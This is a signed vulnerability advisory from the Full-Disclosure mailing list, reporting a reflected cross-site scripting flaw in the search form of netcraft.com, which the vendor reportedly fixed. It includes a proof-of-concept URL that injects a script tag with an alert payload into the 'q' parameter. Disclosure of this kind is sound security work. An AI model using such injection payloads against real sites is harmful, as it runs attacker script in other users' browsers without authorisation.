-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Advisory: www.netcraft.com - Search Form Cross-site Scripting vulnerability Advisory ID: SSCHADV2013-008 Author: Stefan Schurtz Affected Software: Successfully tested on www.netcraft.com Vendor URL: http://www.netcraft.com Vendor Status: fixed ========================== Vulnerability Description ========================== The 'q'-Parameter in the Search Form on www.netcraft.com is prone to a XSS vulnerability. ========================== PoC-Exploit ========================== // IE8 & IE 10 & Aurora 8.0 http://www.netcraft.com/search/?q=127.0.0.1";></iframe><script>alert(document.domain)</script>&submit=Search&submit=Search ========================== Solution ========================== fixed ========================== Disclosure Timeline ========================== 12-May-2013 - vendor informed by email 13-may-2013 - feedback from vendor ========================== Credits ========================== Vulnerability found and advisory written by Stefan Schurtz. ========================== References ========================== http://www.netcraft.com http://www.darksecurity.de/advisories/2013/SSCHADV2013-008.txt -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (MingW32) Comment: Thunderbird-Portable 3.1.20 by GnuPT - Gnu Privacy Tools Comment: Download at: http://thunderbird.gnupt.de iEYEARECAAYFAlGSiigACgkQg3svV2LcbMBgIACbBCTbp7FdWDmdKv1qvecfgwX3 R08AmgM/Y93S4SkM7JMc4st1/X4Yq5uH =9TqK -----END PGP SIGNATURE-----
Attachment:
0x62DC6CC0.asc
Description: application/pgp-keys
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/